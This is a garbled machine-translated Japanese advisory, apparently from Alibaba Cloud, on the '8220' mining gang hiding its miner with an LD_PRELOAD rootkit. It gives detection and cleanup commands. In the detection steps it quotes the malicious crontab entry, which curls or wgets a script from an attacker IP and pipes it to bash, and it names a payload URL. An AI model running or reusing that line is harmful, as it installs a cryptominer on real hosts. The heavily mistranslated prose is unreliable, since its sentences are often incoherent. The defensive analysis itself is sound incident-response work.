最近、チームはより多くの永住者ホストのアリクラウドセキュリティ8220鉱業グループは、最大の利益を得るために自分自身を隠すためにルートキット技術を使用して開始することがわかりました。このような隠れ技術動向は、徐々に隠し、その後、使用後に鉱山ワームや他の番犬の使用と進化を広めるために、ホスト側で戦うために期待され始めた主流になるだろう。
背景
アリクラウドモニタリングプラットフォームのセキュリティチームは、ワームが必要なスクリプトは、常駐鉱業プログラムなので、ダウンロードしたファイルの新しい追加ダウンロードに加えて、8220人の鉱業ギャングが更新を表示されたスクリプトをダウンロード見つかり:http://107.174.47.156/ 1.so。
8220マイニングギャングは、複数の脆弱性を利用して長期的に活性な攻撃であり、国内のグループのマイニングプログラムを展開する[1-2]は、WebLogic XMLDecoderのデシリアライゼーションの脆弱性(CVE-2017から10271)の組み合わせを使用してギャング、DrupalのRCE ( CVE-2018-7600)は、JBossのデシリアライゼーションコマンドが実行される脆弱性(CVE-2017から12149)、およびその他の脆弱性を攻撃し、利益のために採掘プログラムを展開します。
関連するスクリプトなどの簡単な分析によって、我々は[3]それ自身を隠すために8220が彼らの攻撃ツールでProcessHiderのギャングを用いて塗布されていることを確認します。ProcessHiderは広く、多数のマルウェア、ルートキットを利用しています。鉱業ワームは、このツールは、それによって収益を最大化するために、生存時間マイニングマイニングプロセスを増やし、従来の手段によって検出するために、管理者マイニングプロセスが困難できます使用しています。時間が経つにつれて、より多くの採掘ワームがあるかもしれないルートキット機能を追加しました。
ワーム検出
あなたはCPUが大幅に増加、クラウドカトンコンソールのマシンの全体的なパフォーマンスを見ますが、ログインマシンがPS / TOPコマンドを使用している場合は、特定のCPU集中型のプロセスを見つけることができない、今回のマシンはこのような使用のルートキットに感染している可能性があります鉱業ワームは非表示にします。
1.ホスト検出
ワームは、ファイルは、システム上、およびその結果を正しく返さないAPIのPS / TOPシステムコマンドによって返さ依存のreaddir関数を、ハイジャックでロードするようにして自分自身を作り、LD_PRELOADメカニズムを利用します。そのため、影響を受けるシステムコマンドのユーザーは、実質的な進展は表示されません。
上記のように、ワーム隠しプロセスキーワードがkworkerdsです。
ワームは、ホスト側で次のコマンドを使用して検出することができます
查看动态链接库
#ldd /bin/top|grep usr
/usr/local/lib/libkk.so (0x00007f0f94026000)
发现存在异常的so文件
查看 PRE_LOAD系统变量
#cat /etc/ld.so.preload
/usr/local/lib/libkk.so
发现preload文件被修改
查看 crontab
#crontab -l
*/30 * * * * (curl -s http://107.174.47.156/mr.sh||wget -q -O - http://107.174.47.156/mr.sh)|bash -sh
发现crontab出现奇怪的定时任务プロセスの一般的な平面図を使用します。
LD_PRELOADは、動的リンク・プロセスに依存して、静的にコンパイルbusyboxのtopコマンド実行の使用は、全体のプロセスの本当のを見ることができます。
2.ネットワーク検出
エスカレート対決では、自己非表示機能の採掘ワームは重武装ワームの顔をアップグレードしていきます、ホスト側の一般ユーザは、そのコストと低所得に対して極めて好調に推移しました。そのようなワームは、より効率的にネットワーク側から、NTA(ネットワークトラフィック分析)機能のために検出します。攻撃者は、ホスト側で隠された方法を使用しますが、そのリモートダウンロード、C&C通信、鉱業、その他の行為のプール通信は、ネットワークトラフィックのマークを残して何をどんなにので。
図は、感染したホストファイルのバックドアの挙動のダウンロードを検出することにより、ワームのネットワークファイアウォール雲の記録に含まれています。
リハビリテーションプログラム
ローカルコマンド以降1.ハイジャックされていてもよいので、コマンドのシステムの実施を確保するための命令を実行する最初のダウンロード静的にコンパイルbusyboxのは影響を受けハイジャックされていません。
下载二进制
#wget https://www.busybox.net/downloads/binaries/1.27.1-i686/busybox
赋予执行权限
#chmod +x busybox2.クリーンダイナミックハイジャック
./busybox rm -f /usr/local/lib/libkk.so 2>/dev/null
./busybox chattr -i /etc/ld.so.preload 2>/dev/null
./busybox chattr -i /usr/local/lib/libkk.so 2>/dev/null
./busybox rm -f /etc/ld.so.preload
./busybox touch /etc/ld.so.preload
./busybox chattr +i /etc/ld.so.preload
ldconfig3.悪質なプロセスと関連文書を殺します
./busybox ps -ef | ./busybox grep -v grep | ./busybox egrep 'kworkerds' | ./busybox awk '{print $1}' |./busybox sed "s/root//g" | ./busybox xargs kill -9 2>/dev/null
./busybox ps -ef | ./busybox grep -v grep | ./busybox egrep '107.174.47.156' | ./busybox awk '{print $1}' |./busybox sed "s/root//g" | ./busybox xargs kill -9 2>/dev/null
./busybox rm -f /var/tmp/kworkerds
./busybox rm -f /var/tmp/sustse*4.修理のcrontab
./busybox chattr -i /etc/cron.d/root 2>/dev/null
./busybox rm -f /etc/cron.d/root
./busybox chattr -i /etc/cron.d/apache 2>/dev/null
./busybox rm -f /var/spool/cron/apache
./busybox chattr -i /var/spool/cron/root 2>/dev/null
./busybox rm -f /var/spool/cron/root
./busybox chattr -i /var/spool/cron/crontabs/root 2>/dev/null
./busybox rm -f /var/spool/cron/crontabs/root
./busybox rm -rf /var/spool/cron/crontabs
./busybox touch /var/spool/cron/root
./busybox chattr +i /var/spool/cron/rootcrontabファイル5. [修理もう一度、もう一度実行するために、ステップ3に戻ります
6 ..修理が完了し、crontabファイルを再起動します
service crond startREF:
1.疑い国内の情報源「8220人の鉱業ギャング」トレーストレーサビリティ分析[ https://www.freebuf.com/column/179970.html]
2.「8220ギャング」最近のアクティビティ分析:ダンスマイニングと恐喝トロイの木馬ウイルス[ https://www.freebuf.com/column/186467.html]